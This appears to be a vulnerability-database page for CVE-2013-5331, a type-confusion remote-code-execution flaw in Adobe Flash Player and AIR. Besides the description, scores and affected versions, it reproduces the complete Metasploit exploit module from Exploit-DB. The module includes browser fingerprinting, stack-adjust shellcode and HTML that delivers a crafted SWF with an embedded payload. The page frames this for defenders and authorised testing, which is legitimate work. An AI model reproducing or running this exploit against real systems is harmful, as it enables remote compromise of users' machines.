VIR Vulnerability Intelligence Relay

CVE-2013-5331

critical
Published 2013-12-11 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11.9.900.170 on Windows and Mac OS X and before 11.2.202.332 on Linux, Adobe AIR before 3.9.0.1380, Adobe AIR SDK before 3.9.0.1380, and Adobe AIR SDK & Compiler before 3.9.0.1380 allow remote attackers to execute arbitrary code via crafted .swf content that leverages an unspecified "type confusion," as exploited in the wild in December 2013.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33095 remote windows verified ruby ยท 4 KB
Metasploit ยท 2014-04-29

Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)

ruby exploit Source: Exploit-DB 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player Type Confusion Remote Code Execution",
      'Description'    => %q{
        This module exploits a type confusion vulnerability found in the ActiveX
        component of Adobe Flash Player. This vulnerability was found exploited
        in the wild in November 2013. This module has been tested successfully
        on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170
        over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'bannedit', # Exploit in the wild discoverer, analysis and reporting
          'juan vazquez' # msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-5331' ],
          [ 'OSVDB', '100774'],
          [ 'BID', '64199'],
          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ],
          [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ]
        ],
      'Payload'        =>
        {
          'Space' => 2000,
          'DisableNops' => true,
          'PrependEncoder' => stack_adjust
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f',
          'Retries'              => false,
          'EXITFUNC'             => "thread"
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
          :method  => "LoadMovie",
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' }
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 10 2013",
      'DefaultTarget'  => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def stack_adjust
    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset

    adjust
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = get_profile(tag)
    profile[:tried] = false unless profile.nil? # to allow request the swf
    print_status("showme the money")
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    flash_payload = ""
    get_payload(cli,target_info).unpack("V*").each do |i|
      flash_payload << "0x#{i.to_s(16)},"
    end
    flash_payload.gsub!(/,$/, "")


    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=flash_payload%>" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" )
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end

Metasploit modules

exploit_windows/browser/adobe_flash_filters_type_confusion rank 300
Adobe Flash Player Type Confusion Remote Code Execution
Source fetch failed: fetch_error โ€” view the original via the link above.

OS impact
linux Linux kernel Fixed 1 release
VersionStatusFixed in
- Not affected โ€”
macos macOS Fixed 1 release
VersionStatusFixed in
- Not affected โ€”

Application impact
VendorProductVersionsFixed
adobe adobeflash_player{"startIncluding":"11.0","endExcluding":"11.7.700.257"}11.7.700.257
adobe adobeair{"endExcluding":"3.9.0.1380"}3.9.0.1380
adobe adobeair_sdk{"endExcluding":"3.9.0.1380"}3.9.0.1380

References

CWEs

CWE-94

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.